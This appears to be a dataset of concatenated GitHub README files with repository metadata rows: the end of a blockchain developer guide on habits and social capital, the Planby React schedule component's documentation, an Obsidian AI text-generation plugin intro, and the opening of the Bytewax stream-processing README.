#### Project management
As a software developer, you're going to work with many different people when you join a team or try to build a product yourself - from designers, front/back end devs, DevOps, data engineers to lawyers, product managers, etc. There will be systems set in place in the most mature developer environments to coordinate as an organization. Popular methods are [Agile](https://www.atlassian.com/agile#:~:text=Agile%20is%20an%20iterative%20approach,small%2C%20but%20consumable%2C%20increments.) and [SCRUM](https://en.wikipedia.org/wiki/Scrum_(software_development)). Popular apps for managing all of these processes, tasks, and interactions include tools like Asana, Linear, Jira, Trello, Notion, etc.
### Self-development
To reach your peak, you need to create a sustainable set of habits that will allow you to keep working hard consistently. Since we are all human beings, we need to keep our bodies in check, as they are the hosts for our brains responsible for producing bug-free code. Note that this section is not professional advice as I am not an expert in these fields, and I am not a licensed advisor. If you want guidance in any areas covered, please consult with an expert trainer, nutritionist, therapist, coach, etc.
#### Working out
Exercise is an integral part of life as it allows the body to maintain physical fitness, health, and overall wellness. Developers are usually portrayed in modern culture as people who do not exercise very often, as sedentary people who sit on a chair all day and do not prioritize their health. It is essential to be active throughout the day even though we are programming most of the time. I recommend using a standing desk that you can adjust for any height. You can stand up and keep coding when you are tired of sitting. Some individuals also get a small walking board underneath the table to walk while coding.
Another good technique is a slight modification of the Pomodoro technique that replaces the break period with a short exercise period. The most prevalent version consists of 45 minutes of focused work and a 15-minute workout. I like to alternate activities during the workout period.
Other positive effects of exercising are clearer thinking as the brain has more oxygen inflow, stronger immune, cardiovascular system, and more. For more guidance on achieving physical fitness and what exercises to do, please consult with an expert.
#### Nutrition
Nutrition is an area that is very easy to overlook, especially when an individual is young and their metabolism can deal with living an unhealthy lifestyle.
Eating the right amounts of food within a varied diet is an integral part of a healthy lifestyle, and everyone should take it seriously. For more information, please consult with a nutritionist or dietary expert or do your research as nutrition varies a lot per individual, and I'm not qualified to give advice.
### Other
Self-development is a very wide topic and there's a lot more to improve than health, fitness and nutrition. You can improve your mindset, define your own values and create systems that will allow you to uphold those values as you go about life, there's spiritual discovery, learning about various aspects of life, etc. Most of these other topics although significant do not have a direct impact on your performance as a developer, so I'll refrain from talking about them. Feel free to suggest any changes to this section via GitHub pull request.
## Social Capital
### Introduction
Social capital expresses how much influence you have within social circles, good metrics to denominate social capital in are:
- relevant followers across social platforms within the industry
- reputation formed by building, creating, contributing to the space
- friends in the space that will help you grow, that you can learn from, that you can rely on, that you can discuss your ideas with and get constructive criticism from.
- connections with people that can introduce you or vouch for you in different situations
- etc
There's various methods to accrue social capital which will be talked about within this guide and will be expanded upon over time. Most consist in outputting relevant content, networking and interacting with people in the space, building products, contributing to the ecosystem in different ways, providing value (or fun), and many other methods.
In order to meet 'good' people in the space you also need to spend your time in the right places and doing the right things, this guide will help you streamline your focus and save time by not wasting it in places where people are not listening or places which are used to achieve different goals from accruing social capital.
Another important aspect of accruing social capital is putting out content which other people find interesting, engaging, relevant or valuable. As a developer in the space, your content should provide valuable to other people within the space: to developers, and other people wanting to get a more technical overview of the field/products/projects you're working on. There's also lots of potential to accrue social capital by creating educational resources like trivia, fun facts, guides, tutorials, reviews, talks, discussions, debates, etc. A good example of this is devpill.me itself, where me (dcbuild3r) contributing content to this public good guide helps others know about me and that I'm creating a resource that is benefiting anyone, people who are interested in learning about blockchain development follow me.
### How to leverage social platforms to grow as a developer
The most relevant platforms to interact with people in the space are:
#### Twitter
Twitter is used to write short form content that either redirects to long form content like Medium, Mirror, Substack, ... articles or it is content short enough to fit in a few tweets unless you write a 206-tweet long tweet (in which case @thereaderapp is useful to make long tweets readable).
#### Telegram
Telegram is a single threaded chatting platform which is generally used for simple group chats and newsletters in crypto, as a developer there are a few groups which you can follow within your specific realm of interest or create group chats with friends in order to discuss various topics, create a learning group for a programming language, protocol, or topic, and more. Telegram is good for simple one-thread conversations where you don’t need to manage asynchronous communication.
#### Discord
Discord groups are useful once you have a big community, DAO, or friend group which you want to participate in. For developers there are various good groups like Buildspace, Developer DAO, and others. It is also used by different teams to manage contributions to an application, protocol or service. So for example if you become a contributor to an open-source project like Aave and you want to recommend a change to one of its open codebases and the change gets accepted, the coordination, and all the processes usually go through Discord. Many projects also help new contributors get started with building with a project and if you are learning something new it is a good place to ask technical questions.
#### Real life events
Although not available to everyone there are events hosted all around the world where people from different communities within web3 and crypto gather together in order to organize conferences, hackathons, parties, meetups, talks and more. Real life events are one of the best places to find like-minded people to become friends with, to get hired, to network with other interesting people in the space, to learn, to build new projects at hackathons and push your own boundaries, etc. It is underrated just how much you can grow as a developer if you surround yourself with people that have the same properties that you want to acquire for yourself. The people around you can push you to grow and take you to new heights as they expose you to new challenges and help you along the way.
### Who to interact with
When you are on the social platforms mentioned above you should target the people that help you grow, and make connections with them.
- experts in your preferred field of interest
If you talk to people with expertise in the fields that you want to become skilled in, then you’ll have a much easier time learning them, you’ll get good connections that will propel you forward in your career and you will also most likely have more opportunities and resources to grow as a developer by getting hired, getting tips on how to learn about your specialization field efficiently and more!
- people trying to learn the same things you are learning
It is good to share ideas and have two way feedback on any topic you are learning from other people learning the same material you are, especially if they are more experienced than you are. Another good reason to learn in groups (ideally pairs) is that teaching is the best way to solidify your own knowledge as when you have to explain a complex topic simply, you need to have a good understanding of any given topic so that you are capable of explaining it. More on this in the [Mastery](https://www.devpill.me/docs/mastery/introduction) section.
- people building other primitives in the web3/crypto space (expand horizons)
As someone trying to learn more about blockchain development, especially when you are starting out, it is great to explore at the beginnning and try many different things before you start specializing in any given field of development. That's why you should follow the most proficient people in different fields in order to get a bird's eye view of the space. Also I recommend reading over other sections within devpill.me so that you can see what is out there to learn.
### What content to put out
In order to amass social capital, putting out good content out into different popular social platforms is crucial as people like to follow individuals and groups that they can get value from. E.g.: if you start talking about building in DeFi, then individuals interested in DeFi will start to follow you, like and retweet your posts, engage to conversations in comments, etc. As a blockchain developer in any specialization there's different ways in which you can provide interesting content and distribute it across different social platforms.
- document > create at the beginning
When you start out as a blockchain developer you usually won't have any novel findings, cool things that you are building or projects you are working on, so it is good to share your own learning proccess and your journey becoming a blockchain developer.
- talk about your learnings in your journey:
It is good to talk about different resources you are using to learn the topics you are interested in, share it with others and tell them how it has helped you learn about a specific topic, also provide commentary and helpful tips which might be missed by people only skimming through the resources and haven't gone into depth.
- talk about the tools you use:
Developers love to talk about their tooling, what libraries they use, what IDE and extensions they use to write code, what services, and applications they use on a daily basis to organize themselves and be productive, and much more.
- ask questions about the things you are learning:
chances are that many people following you have had the same questions as you in the past and they can provide you with a lot of helpful insight about any given topic
- be active in threads in that are relevant to your interests:
if there relevant events happening within the space that you are interested in, it is a good idea to engage in public discourse with other people around those events in order to get a better overview of what's happening and to try to extract valuable information / learnings out of it
- retweet things that happen within your field of interest with commentary / opinions
- summarize articles, talks, events, updates, discuss code within the projects / fields that interest you.
- shitpost (express your own personality / be yourself) for engagement (grows your network whilst having fun):
Be creative, development doesn't need to be everything you talk about, many also use social platforms to make friends and have fun, so you can also do funny content, light-hearted threads on any given topic, post pictures of your dog, or whatever you want. Expressing your own individuality is also useful to create your own personal brand on socials.
## Conclusion
Thank you for checking out the blockchain development guide, if there is any content you'd like to see getting added, please check out the [contributors](#contributors) section and suggest it there. The goal is to make this guide and [devpill.me](https://devpill.me/) the best blockchain development guide out there. Thank you for your support.
## Special thanks
Special thanks to all the contributors:
- [@protolambda](https://twitter.com/protolambda) - author of the [Ethereum core development section](https://www.devpill.me/docs/core-development/introduction/)
- [@0xjepsen](https://twitter.com/0xjepsen) - author of the [cryptography section](https://www.devpill.me/docs/cryptography/introduction/)
| Devpill.me - A Public Good Blockchain Development Guide | ethereum,blockchain-development,solidity,full-stack,decentralized-finance,mev | 0 | 33 | 16 | 78 | 3 | 3 | 0 |
karolkozer/planby | <div align="center" style="margin-bottom: 10px">
<a href="https://www.npmjs.com/package/planby">
<img src="https://i.postimg.cc/J0XMPHNQ/planby-logo.png" alt="Planby logo" />
</a>
</div>
<div align="center" style="margin-bottom: 20px">
<a href="https://www.npmjs.com/package/planby">
<img alt="npm" src="https://img.shields.io/npm/v/planby" />
</a>
<a href="https://npmjs.org/package/planby">
<img alt="downloads" src="https://badgen.net/npm/dm/planby" />
</a>
<a href="https://npmjs.org/package/planby">
<img alt="downloads" src="https://img.shields.io/npm/dt/planby?color=%2327ae60&label=recent%20downloads" />
</a>
<a href="https://opencollective.com/planby#sponsor" target="_blank"><img src="https://img.shields.io/badge/Support%20us-Open%20Collective-41B883.svg" alt="Support us"></a>
</div>
## Description
Planby is a React based component for a quick implementation of Epg, schedules, live streaming, music events, timelines and many more ideas. It uses a custom virtual view which allows you to operate on a really big number of data. The component has a simple API that you can easily integrate with other third party UI libraries. The component theme is customised to the needs of the application design.
<div align="center" style="margin-bottom: 10px">
<a href="https://planby.netlify.app/">
<img src="https://i.postimg.cc/6p2GDGMX/tv-preview-custom.png" alt="Planby preview" />
</a>
</div>
<div align="center" style="margin-bottom: 10px">
<a href="https://planby.netlify.app/">
<img src="https://i.postimg.cc/s2Pn9jGZ/planby-conf-event.png" alt="Planby preview" />
</a>
</div>
<div align="center" style="margin-bottom: 10px">
<a href="https://planby.netlify.app/">
<img src="https://raw.githubusercontent.com/karolkozer/planby-demo-resources/master/planby-planner-week.png" alt="Planby preview" />
</a>
</div>
<div align="center" style="margin-bottom: 10px">
<a href="https://planby.netlify.app/">
<img src="https://i.postimg.cc/50qZ05ST/planby-music-festival-event.png" alt="Planby preview" />
</a>
</div>
## Codesandbox example
[Live example - Codesandbox](https://codesandbox.io/s/5o3tsy)
[Live example - Typescript Codesandbox](https://codesandbox.io/s/planby-epg-demo-ts-lp66v5)
[Live example - website with control panel](https://planby.netlify.app/)
## Testimonials
<div align="center" >
<a href="https://planby.netlify.app/#testimonials">
<img src="https://raw.githubusercontent.com/karolkozer/planby-demo-resources/master/they-use-planby.png" alt="Planby preview" />
</a>
</div>
<div align="center" style="margin-bottom: 10px">
<a href="https://planby.netlify.app/#testimonials">
<img src="https://raw.githubusercontent.com/karolkozer/planby-demo-resources/master/testimonials.png" alt="Planby preview" />
</a>
</div>
## 🚀 [Become a Sponsor!](https://opencollective.com/planby) 🚀
Become a sponsor, support, and help us in continuing our development. -> [Opencollective](https://opencollective.com/planby)
## Getting Started
### Installation
- yarn
```sh
yarn add planby
```
- npm
```sh
npm install planby
```
## Usage
```tsx
import { useEpg, Epg, Layout } from 'planby';
const channels = React.useMemo(
() => [
{
logo: 'https://via.placeholder.com',
uuid: '10339a4b-7c48-40ab-abad-f3bcaf95d9fa',
...
},
],
[]
);
const epg = React.useMemo(
() => [
{
channelUuid: '30f5ff1c-1346-480a-8047-a999dd908c1e',
description:
'Ut anim nisi consequat minim deserunt...',
id: 'b67ccaa3-3dd2-4121-8256-33dbddc7f0e6',
image: 'https://via.placeholder.com',
since: "2022-02-02T23:50:00",
till: "2022-02-02T00:55:00",
title: 'Title',
...
},
],
[]
);
const {
getEpgProps,
getLayoutProps,
onScrollToNow,
onScrollLeft,
onScrollRight,
} = useEpg({
epg,
channels,
startDate: '2022/02/02', // or 2022-02-02T00:00:00
});
return (
<div>
<div style={{ height: '600px', width: '1200px' }}>
<Epg {...getEpgProps()}>
<Layout
{...getLayoutProps()}
/>
</Epg>
</div>
</div>
);
```
or
#### Custom width and height
```tsx
const {
getEpgProps,
getLayoutProps,
...
} = useEpg({
epg,
channels,
startDate: '2022/02/02', // or 2022-02-02T00:00:00
width: 1200,
height: 600
});
return (
<div>
<Epg {...getEpgProps()}>
<Layout
{...getLayoutProps()}
/>
</Epg>
</div>
```
or
#### Time range
```tsx
const {
getEpgProps,
getLayoutProps,
...
} = useEpg({
epg,
channels,
startDate: '2022-02-02T10:00:00',
endDate: '2022-02-02T20:00:00',
width: 1200,
height: 600
});
return (
<div>
<Epg {...getEpgProps()}>
<Layout
{...getLayoutProps()}
/>
</Epg>
</div>
```
## API
### useEpg
#### Options
Available options in useEpg
| Property | Type | Status | Description | Access |
| ------------------------ | --------- | -------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | ------ |
| `channels` | `array` | required | Array with channels data | |
| `epg` | `array` | required | Array with EPG data | |
| `width` | `number` | optional | EPG width | |
| `height` | `number` | optional | EPG height | |
| `sidebarWidth` | `number` | optional | Width of the sidebar with channels | |
| `timelineHeight` | `number` | optional | Height of the timeline | `PRO` |
| `itemHeight` | `number` | optional | Height of channels and programs in the EPG. Default value is 80 | |
| `dayWidth` | `number` | optional | Width of the day. Default value is 7200. Calculation to set up day width with own hour width value e.g., 24h \* 300px (your custom hour width) = 7200px -> `dayWidth` | |
| `startDate` | `string` | optional | Date format `2022/02/02` or `2022-02-02T00:00:00`. You can set your own start time, e.g., `2022-02-02T10:00:00`, `2022-02-02T14:00:00`, etc. Full clock hours only | |
| `endDate` | `string` | optional | Date format `2022-02-02T00:00:00`, `2022-02-02T20:00:00`, etc. Must be within the same 24-hour period as `startDate`. Full clock hours only. Scroll through `multiple days` and timeline mode is available only in `PRO` plan. | `PRO` |
| `hoursInDays` | `array` | optional | Set start time and end time of each day in `multiple days` feature if your data for each day has some time spaces between items in the day. | `PRO` |
| `initialScrollPositions` | `object` | optional | Set initial scroll position in Layout, e.g., `initialScrollPositions: { top: 500, left: 800 }` | `PRO` |
| `liveRefreshTime` | `number` | optional | Live refresh time of the events. Default value is 120 sec. | `PRO` |
| `isBaseTimeFormat` | `boolean` | optional | Convert to 12-hour format, e.g., `2:00am`, `4:00pm`, etc. Default value is false. | |
| `isCurrentTime` | `boolean` | optional | Show current time in Timeline. Default value is false. | `PRO` |
| `isInitialScrollToNow` | `boolean` | optional | Scroll to the current live element. | `PRO` |
| `isVerticalMode` | `boolean` | optional | Show Timeline in vertical view. Default value is false. | `PRO` |
| `isResize` | `boolean` | optional | Possibility to resize the element. | `PRO` |
| `isSidebar` | `boolean` | optional | Show/hide sidebar | |
| `isTimeline` | `boolean` | optional | Show/hide timeline | |
| `isLine` | `boolean` | optional | Show/hide line | |
| `isRTL` | `boolean` | optional | Change direction to RTL or LTR. Default value is false. | `PRO` |
| `theme` | `object` | optional | Object with theme schema | |
| `timezone` | `object` | optional | Convert and display data from UTC format to your own time zone | `PRO` |
| `areas` | `array` | optional | Area gives possibilities to add field ranges to the Timeline layout. | `PRO` |
| `mode` | `object` | optional | Type values: `day/week/month`. Style values: `default/modern` Define the mode and style of the timeline. Default mode is `day` and style is `default` | `PRO` |
| `overlap` | `object` | optional | Enable the element overlaps in the layout. Mode values: `stack/layer`, layerOverlapLevel: `number` | `PRO` |
| `drag and drop` | `object` | optional | Drag and move the element in the layout. Mode values: `row/multi-rows` | `PRO` |
| `grid layout` | `object` | optional | Background grid on the layout. Mode hoverHighlight values: `true/false`, onGridItemClick: function with all the properties on clicked item grid | `PRO` |
| `channelMapKey` | `string` | optional | The Channel `uuid` attribute can be controlled by prop. Key map gives a possibilities to use specific prop from own data instead of needing to map to uuid in own data | `PRO` |
| `programChannelMapKey` | `string` | optional | The Programs `channelUuid` attributes can be controlled by prop. Key map gives a possibilities to use a specific prop from own data instead of needing to map to channelUuid in your data | `PRO` |
| `globalStyles` | `string` | optional | Inject custom global styles and font. Font weight: 400,500,600. Default font is "Inter" | `PRO` |
#### Note about width and height props
Without declaring the `width` and `length` properties, the component takes the dimensions of the parent element.
#### globalStyles
Inject own custom font and other global styles.
```tsx
const globalStyles = `
@import url("https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600&display=swap");
/* Available in PRO plan */
.planby {
font-family: "Inter", system-ui, -apple-system, "Segoe UI", Roboto, Helvetica,
Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji";
/* Layout */
.planby-layout {}
/* Line */
.planby-line {}
/* Current time */
.planby-current-time {}
.planby-current-content {}
/* Channels */
.planby-channels {}
/* Channel */
.planby-channel {}
/* Program */
.planby-program {}
.planby-program-content {}
.planby-program-flex {}
.planby-program-stack {}
.planby-program-title {}
.planby-program-text {}
/* Timeline */
.planby-timeline-wrapper {}
.planby-timeline-box {}
.planby-timeline-time {}
.planby-timeline-dividers {}
.planby-timeline-wrapper {}
}
`;
```
#### Instance Properties
Properties returned from useEpg
| Property | Type | Description |
| --------------- | ------------------------- | ------------------------------------ |
| `scrollY` | `number` | Current scroll y value |
| `scrollX` | `number` | Current scroll x value |
| `onScrollLeft` | `function(value: number)` | Default value is 300 |
| `onScrollRight` | `function(value: number)` | Default value is 300 |
| `onScrollToNow` | `function()` | Scroll to current time/live programs |
| `onScrollTop` | `function(value: number)` | Default value is 300 |
### Channel schema
| Property | Type | Status |
| -------- | -------- | -------- |
| `logo` | `string` | required |
| `uuid` | `string` | required |
### Epg schema
| Property | Type | Status | Description | Access |
| ----------------- | --------- | -------- | -------------------------------------------------------------------- | -------- |
| `channelUuid` | `string` | required |
| `id` | `string` | required |
| `image` | `string` | required |
| `since` | `string` | required |
| `till` | `string` | required |
| `title` | `string` | required |
| `fixedVisibility` | `boolean` | optional | The element is always visible in the layout during the scroll events | Sponsors |
### Epg
#### Base props
Available props in Epg
| Property | Type | Description | Status |
| ----------- | ----------- | ----------------------- | -------- |
| `isLoading` | `boolean` | Loader state | optional |
| `loader` | `Component` | Loader custom component | optional |
### Layout
#### Base props
Available props in Layout.
| Property | Type | Description | Status | Access |
| ------------------- | ------------------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------- | -------- | ---------- |
| `renderProgram` | `function({ program: { data: object, position: object})` | `data` object contains all properties related to the program, `position` object includes all position styles | optional |
| `renderChannel` | `function({ channel: { ..., position: object})` | `channel` object contains all properties related to the channel, `position` object includes all position styles | optional |
| `renderTimeline` | `function({sidebarWidth: number})` | `sidebarWidth` value of the channel's sidebar width | optional |
| `renderLine` | `function({styles: object})` | basic `styles` and `position` values for the custom live tracking Line | optional | `Sponsors` |
| `renderCurrentTime` | `function({styles: object, isRTL: boolean, isBaseTimeFormat: boolean, time: string})` | basic `styles` values for the custom current time | optional | `Sponsors` |
# Render functions
You can use Plaby's style components to develop main features. Moreover, you can integrate with third party UI library eg. Chakra UI, Material UI etc or make custom styles.
## renderProgram
Below is an example that allows you to render your custom Program component using Plaby's style components.
```tsx
import {
useEpg,
Epg,
Layout,
ProgramBox,
ProgramContent,
ProgramFlex,
ProgramStack,
ProgramTitle,
ProgramText,
ProgramImage,
useProgram,
Program,
ProgramItem
} from "planby";
const Item = ({ program,...rest }: ProgramItem) => {
const { styles, formatTime, isLive, isMinWidth } = useProgram({ program,...rest });
const { data } = program;
const { image, title, since, till } = data;
const sinceTime = formatTime(since);
const tillTime = formatTime(till);
return (
<ProgramBox width={styles.width} style={styles.position}>
<ProgramContent
width={styles.width}
isLive={isLive}
>
<ProgramFlex>
{isLive && isMinWidth && <ProgramImage src={image} alt="Preview" />}
<ProgramStack>
<ProgramTitle>{title}</ProgramTitle>
<ProgramText>
{sinceTime} - {tillTime}
</ProgramText>
</ProgramStack>
</ProgramFlex>
</ProgramContent>
</ProgramBox>
);
};
function App() {
...
const {
getEpgProps,
getLayoutProps,
} = useEpg({
epg,
channels,
startDate: '2022/02/02', // or 2022-02-02T00:00:00
});
return (
<div>
<div style={{ height: '600px', width: '1200px' }}>
<Epg {...getEpgProps()}>
<Layout
{...getLayoutProps()}
renderProgram={({ program,...rest }) => (
<Item key={program.data.id} program={program} {...rest} />
)}
/>
</Epg>
</div>
</div>
);
}
export default App;
```
## renderProgram - 12 hours time format
Below is an example that allows you to render your custom Program component with 12 hours time format using Plaby's style components.
```tsx
...
const Item = ({ program, ...rest }: ProgramItem) => {
const {
styles,
formatTime,
set12HoursTimeFormat,
isLive,
isMinWidth,
} = useProgram({
program,
...rest
});
const { data } = program;
const { image, title, since, till } = data;
const sinceTime = formatTime(since, set12HoursTimeFormat()).toLowerCase();
const tillTime = formatTime(till, set12HoursTimeFormat()).toLowerCase();
return (
<ProgramBox width={styles.width} style={styles.position}>
<ProgramContent
width={styles.width}
isLive={isLive}
>
<ProgramFlex>
{isLive && isMinWidth && <ProgramImage src={image} alt="Preview" />}
<ProgramStack>
<ProgramTitle>{title}</ProgramTitle>
<ProgramText>
{sinceTime} - {tillTime}
</ProgramText>
</ProgramStack>
</ProgramFlex>
</ProgramContent>
</ProgramBox>
);
};
function App() {
...
const {
getEpgProps,
getLayoutProps,
} = useEpg({
epg,
channels,
isBaseTimeFormat: true,
startDate: '2022/02/02', // or 2022-02-02T00:00:00
});
...
}
export default App;
```
## renderProgram - RTL direction
Below is an example that allows you to render your custom Program component with RTL direction using Plaby's style components.
```tsx
...
const Item = ({ program, ...rest }: ProgramItem) => {
const {
isRTL,
isLive,
isMinWidth,
formatTime,
styles,
set12HoursTimeFormat,
getRTLSinceTime,
getRTLTillTime,
} = useProgram({
program,
...rest
});
const { data } = program;
const { image, title, since, till } = data;
const sinceTime = formatTime(
getRTLSinceTime(since),
set12HoursTimeFormat()
).toLowerCase();
const tillTime = formatTime(
getRTLTillTime(till),
set12HoursTimeFormat()
).toLowerCase();
return (
<ProgramBox width={styles.width} style={styles.position}>
<ProgramContent width={styles.width} isLive={isLive}>
<ProgramFlex>
{isLive && isMinWidth && <ProgramImage src={image} alt="Preview" />}
<ProgramStack isRTL={isRTL}>
<ProgramTitle>{title}</ProgramTitle>
<ProgramText>
{sinceTime} - {tillTime}
</ProgramText>
</ProgramStack>
</ProgramFlex>
</ProgramContent>
</ProgramBox>
);
};
function App() {
...
const {
getEpgProps,
getLayoutProps,
} = useEpg({
epg,
channels,
isBaseTimeFormat: true,
startDate: '2022/02/02', // or 2022-02-02T00:00:00
});
...
}
export default App;
```
## renderChannel
Below is an example that allows you to render your custom Channel component using Plaby's style components.
```tsx
import { useEpg, Epg, Layout, ChannelBox, ChannelLogo, Channel } from 'planby';
interface ChannelItemProps {
channel: Channel;
}
const ChannelItem = ({ channel }: ChannelItemProps) => {
const { position, logo } = channel;
return (
<ChannelBox {...position}>
<ChannelLogo
onClick={() => console.log('channel', channel)}
src={logo}
alt="Logo"
/>
</ChannelBox>
);
};
function App() {
...
const {
getEpgProps,
getLayoutProps,
} = useEpg({
epg,
channels,
startDate: '2022/02/02', // or 2022-02-02T00:00:00
});
return (
<div>
<div style={{ height: '600px', width: '1200px' }}>
<Epg {...getEpgProps()}>
<Layout
{...getLayoutProps()}
renderChannel={({ channel }) => (
<ChannelItem key={channel.uuid} channel={channel} />
)}
/>
</Epg>
</div>
</div>
);
}
```
## renderTimeline
Below is an example that allows you to render your custom Timeline component using Plaby's style components.
```tsx
import {
TimelineWrapper,
TimelineBox,
TimelineTime,
TimelineDivider,
TimelineDividers,
useTimeline,
} from 'planby';
interface TimelineProps {
isBaseTimeFormat: boolean;
isSidebar: boolean;
dayWidth: number;
hourWidth: number;
numberOfHoursInDay: number;
offsetStartHoursRange: number;
sidebarWidth: number;
}
export function Timeline({
isBaseTimeFormat,
isSidebar,
dayWidth,
hourWidth,
numberOfHoursInDay,
offsetStartHoursRange,
sidebarWidth,
}: TimelineProps) {
const { time, dividers, formatTime } = useTimeline(
numberOfHoursInDay,
isBaseTimeFormat
);
const renderTime = (index: number) => (
<TimelineBox key={index} width={hourWidth}>
<TimelineTime>
{formatTime(index + offsetStartHoursRange).toLowerCase()}
</TimelineTime>
<TimelineDividers>{renderDividers()}</TimelineDividers>
</TimelineBox>
);
const renderDividers = () =>
dividers.map((_, index) => (
<TimelineDivider key={index} width={hourWidth} />
));
return (
<TimelineWrapper
dayWidth={dayWidth}
sidebarWidth={sidebarWidth}
isSidebar={isSidebar}
>
{time.map((_, index) => renderTime(index))}
</TimelineWrapper>
);
}
function App() {
...
const {
getEpgProps,
getLayoutProps,
} = useEpg({
epg,
channels,
startDate: '2022/02/02', // or 2022-02-02T00:00:00
});
return (
<div>
<div style={{ height: '600px', width: '1200px' }}>
<Epg {...getEpgProps()}>
<Layout
{...getLayoutProps()}
renderTimeline={(props) => <Timeline {...props} />}
/>
</Epg>
</div>
</div>
);
}
export default App;
```
## renderTimeline - RTL direction
Below is an example that allows you to render your custom Timeline component using Plaby's style components.
```tsx
import {
TimelineWrapper,
TimelineBox,
TimelineTime,
TimelineDivider,
TimelineDividers,
useTimeline,
} from 'planby';
interface TimelineProps {
isRTL: boolean;
isBaseTimeFormat: boolean;
isSidebar: boolean;
dayWidth: number;
hourWidth: number;
numberOfHoursInDay: number;
offsetStartHoursRange: number;
sidebarWidth: number;
}
export function Timeline({
isRTL,
isBaseTimeFormat,
isSidebar,
dayWidth,
hourWidth,
numberOfHoursInDay,
offsetStartHoursRange,
sidebarWidth,
}: TimelineProps) {
const { time, dividers, formatTime } = useTimeline(
numberOfHoursInDay,
isBaseTimeFormat
);
const renderTime = (index: number) => (
<TimelineBox key={index} width={hourWidth}>
<TimelineTime isBaseTimeFormat={isBaseTimeFormat} isRTL={isRTL}>
{formatTime(index + offsetStartHoursRange).toLowerCase()}
</TimelineTime>
<TimelineDividers>{renderDividers()}</TimelineDividers>
</TimelineBox>
);
...
}
```
## Theme
### Schema
Make your theme custom. Below is theme schema that you can pass as one of the options to `useEpg` hook.
```jsx
const theme = {
primary: {
600: '#1a202c',
900: '#171923',
},
grey: { 300: '#d1d1d1' },
white: '#fff',
green: {
300: '#2C7A7B',
},
loader: {
teal: '#5DDADB',
purple: '#3437A2',
pink: '#F78EB6',
bg: '#171923db',
},
scrollbar: {
border: '#ffffff',
thumb: {
bg: '#e1e1e1',
},
},
gradient: {
blue: {
300: '#002eb3',
600: '#002360',
900: '#051937',
},
},
text: {
grey: {
300: '#a0aec0',
500: '#718096',
},
},
timeline: {
divider: {
bg: '#718096',
},
},
};
```
## All import options
```tsx
import {
Epg,
Layout,
ChannelBox,
ChannelLogo,
ProgramBox,
ProgramContent,
ProgramFlex,
ProgramStack,
ProgramTitle,
ProgramText,
ProgramImage,
TimelineWrapper,
TimelineBox,
TimelineTime,
TimelineDividers,
useEpg,
useProgram,
useTimeline,
Program, // Interface
Channel, // Interface
ProgramItem, // Interface for program render
Theme, // Interface
} from 'planby';
```
## License
Custom License - All Rights Reserved. [See `LICENSE` for more information](https://planby.app/docs/planby-license.pdf).
## Contact
Karol Kozer - [@kozerkarol_twitter](https://twitter.com/kozerkarol)
Project Link: [https://github.com/karolkozer/planby](https://github.com/karolkozer/planby)
| null | epg,schedule,harmonogram,eletronic,program,guide,react,component,hooks,web | 16 | 3 | 7 | 128 | 3 | 17 | 0 |
nhaouari/obsidian-textgenerator-plugin | <h1 align="center">obsidian-textgenerator-plugin</h1>
<div align="center">
<a href="https://bit.ly/3ORwT00">Documentation</a>
<span> • </span>
<a href="https://discord.gg/BRYqetyjag">Discord</a>
<span> • </span>
<a href="https://img.shields.io/twitter/follow/TextGenPlugin?style=social)](https://twitter.com/intent/follow?screen_name=TextGenPlugin">Twitter</a>
<br />
<br />
<br />
</div>
## What is Text Generator?
**Text Generator** is an open-source AI Assistant Tool that brings the power of Generative Artificial Intelligence to the power of knowledge creation and organization in Obsidian.
For example, use Text Generator to generate ideas, attractive titles, summaries, outlines, and whole paragraphs based on your knowledge database.
The possibilities are endless!
If you're looking for a place to discuss the use cases of this plugin and share your experiences, head over to our [**Discord Server (Updated)**](https://discord.gg/BRYqetyjag) or the [Discussion](https://github.com/nhaouari/obsidian-textgenerator-plugin/discussions/categories/use-cases). There, you'll find a community of like-minded users who are eager to help you make the most of this powerful tool.
## Features
There are many benefits to using a Text Generator Plugin, including the following:
- **Free and Open Source**: The Text Generator Plugin is free and open source, so you can use it without worrying about licensing fees.
- **Beside Obsidian**: Obsidian is very powerful and extensible Personal Knowledge Management software so you can use Text Generator Plugin alongside Obsidian to create a more powerful Personal Knowledge Management system.
- **Flexible Prompts**: The context of the prompt is straightforward using all the available options in the Considered Context which gives you a higher filexibilty.
- **Template Engine**: You can create templates to make repetitive tasks more manageable.
- **Community Templates**: Through this option you can discover new use cases of Generative Artificial Intelligence using the shared templates and you can share your use cases easier.
- **Highly Flexible Configuration**: Using Frontmatter Configuration, it is possible to use different services such as Google Generative AI(contains `Gemini-Pro`), OpenAI, HuggingFace ...etc.
## Demonstration
[![Youtube Demonstration](https://img.youtube.com/vi/OergqWCdFKc/0.jpg)](https://www.youtube.com/watch?v=OergqWCdFKc)
| Text generator is a handy plugin for Obsidian that helps you generate text content using GPT-3 (OpenAI). | obsidian,obsidian-plugin,plugin,gpt-3,huggingface,nlg,openai,ai,writing,writing-tool | 149 | 17 | 33 | 953 | 30 | 2 | 2 |
bytewax/bytewax | [![Actions Status](https://github.com/bytewax/bytewax/workflows/CI/badge.svg)](https://github.com/bytewax/bytewax/actions)
[![PyPI](https://img.shields.io/pypi/v/bytewax.svg?style=flat-square)](https://pypi.org/project/bytewax/)
[![Bytewax User Guide](https://img.shields.io/badge/user-guide-brightgreen?style=flat-square)](https://docs.bytewax.io/stable/guide/index.html)
<picture>
<source media="(prefers-color-scheme: dark)" srcset="https://github.com/bytewax/bytewax/assets/53014647/cd47293b-72c9-423c-b010-2c4990206c60" width="350">
<source media="(prefers-color-scheme: light)" srcset="https://github.com/bytewax/bytewax/assets/53014647/f376c9e8-5bd4-4563-ba40-3df8761b13fc" width="350">
<img alt="Bytewax">
</picture>
## Python Stateful Stream Processing Framework
Bytewax is a Python framework that simplifies event and stream processing. Because Bytewax couples the stream and event processing capabilities of Flink, Spark, and Kafka Streams with the friendly and familiar interface of Python, you can re-use the Python libraries you already know and love. Connect data sources, run stateful transformations and write to various different downstream systems with built-in connectors or existing Python libraries.
<img width="1303" alt="Bytewax Dataflow Animation" src="https://github.com/bytewax/bytewax/assets/156834296/4e314f17-38ab-4e72-9268-a48ddee7a201">
### How it all works
